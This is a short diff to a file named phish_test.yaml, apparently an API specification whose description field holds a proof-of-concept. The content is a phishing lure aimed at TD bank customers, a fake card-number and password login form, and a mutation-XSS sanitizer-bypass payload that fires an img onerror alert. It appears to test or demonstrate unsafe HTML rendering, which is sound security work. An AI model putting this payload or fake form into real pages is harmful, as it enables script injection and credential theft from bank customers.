--- a/phish_test.yaml
+++ b/phish_test.yaml
@@ -3,8 +3,8 @@ info:
   title: FREE CASH FOR TD CUSTOMERS
   description: |
     <h1>Attention TD Customers.  Want free cash?  Yeah you do.  Just log in to EasyWeb using this handy form and, once you've done it, we'll slide you a cool $1000.</h1>
-    <form><label><input id="textbox" type="text" placeholder="EMAIL" style="width:320px;height=30px"></label><br><label><input  id="textbox" type="text" placeholder="PASSWORD" style="width:320px"></label><br><input type="submit" value="SIGN IN" onclick="msg()"></form>
-    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1></form>
+    <form><label><input id="textbox" type="text" placeholder="AccessCard #" style="width:320px;height=30px"></label><br><label><input  id="textbox" type="text" placeholder="PASSWORD" style="width:320px"></label><br><input type="submit" value="SIGN IN" onclick="msg()"></form>
+    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert("Phished") src=1></form>
 
   version: production
 basePath: /JSSResource/
